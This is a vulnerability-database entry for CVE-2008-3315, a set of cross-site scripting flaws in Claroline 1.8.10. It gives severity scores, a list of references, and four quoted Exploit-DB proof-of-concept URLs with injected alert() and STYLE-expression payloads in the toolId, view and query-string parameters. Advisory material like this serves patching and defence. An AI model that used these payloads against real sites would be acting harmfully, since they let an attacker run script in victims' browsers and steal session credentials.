CVE-2008-3315
published 2008-07-25CVE-2008-3315: Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.8.10 allow remote attackers to inject arbitrary web script or HTML via the (1) query string…
PriorityP420medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.03%
78.6th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.8.10 allow remote attackers to inject arbitrary web script or HTML via the (1) query string to (a) announcements/messages.php; (b) lostPassword.php and (c) profile.php in auth/; (d) calendar/myagenda.php; (e) group/group.php; (f) learningPath.php, (g) learningPathList.php, and (h) module.php in learnPath/; (i) phpbb/index.php; (j) courseLog.php, (k) course_access_details.php, (l) delete_course_stats.php, (m) userLog.php, and (n) user_access_details.php in tracking/; (o) user/user.php; and (p) user/userInfo.php; the (2) view parameter to (q) tracking/courseLog.php; and the (3) toolId parameter to (r) tracking/toolaccess_details.php. NOTE: this may overlap CVE-2006-3257 and CVE-2005-1374.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| claroline | claroline | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting
exploitdb·2008-07-22
CVE-2008-3315 Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting
Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/tracking/toolaccess_details.php?toolId=">alert('DSecRG
XSS')
Exploit-DB
Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting
exploitdb·2008-07-22
CVE-2008-3315 Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting
Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/tracking/courseLog.php?view=DSec"
STYLE="xss:expression(alert('DSecRG XSS'))
Exploit-DB
Claroline 1.8 - 'user/user.php' Query String Cross-Site Scripting
exploitdb·2008-07-22
CVE-2008-3315 Claroline 1.8 - 'user/user.php' Query String Cross-Site Scripting
Claroline 1.8 - 'user/user.php' Query String Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/user/user.php?">alert('DSecRG
XSS')
Exploit-DB
Claroline 1.8 - 'learnPath/calendar/myagenda.php' Query String Cross-Site Scripting
exploitdb·2008-07-22
CVE-2008-3315 Claroline 1.8 - 'learnPath/calendar/myagenda.php' Query String Cross-Site Scripting
Claroline 1.8 - 'learnPath/calendar/myagenda.php' Query String Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/30346/info
Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Claroline 1.8.11 are vulnerable.
http://www.example.com/[installdir]/claroline/calendar/myagenda.php?">alert('DSecRG
XSS')
No writeups or analysis indexed.
http://secunia.com/advisories/31201http://securityreason.com/securityalert/4041http://sourceforge.net/project/shownotes.php?release_id=615030http://wiki.claroline.net/index.php/Changelog_1.8.x#Modification_between_claroline_1.8.10_and_1.8.11http://www.securityfocus.com/archive/1/494655/100/0/threadedhttp://www.securityfocus.com/bid/30346http://www.vupen.com/english/advisories/2008/2167/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43962http://secunia.com/advisories/31201http://securityreason.com/securityalert/4041http://sourceforge.net/project/shownotes.php?release_id=615030http://wiki.claroline.net/index.php/Changelog_1.8.x#Modification_between_claroline_1.8.10_and_1.8.11http://www.securityfocus.com/archive/1/494655/100/0/threadedhttp://www.securityfocus.com/bid/30346http://www.vupen.com/english/advisories/2008/2167/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43962
2008-07-25
Published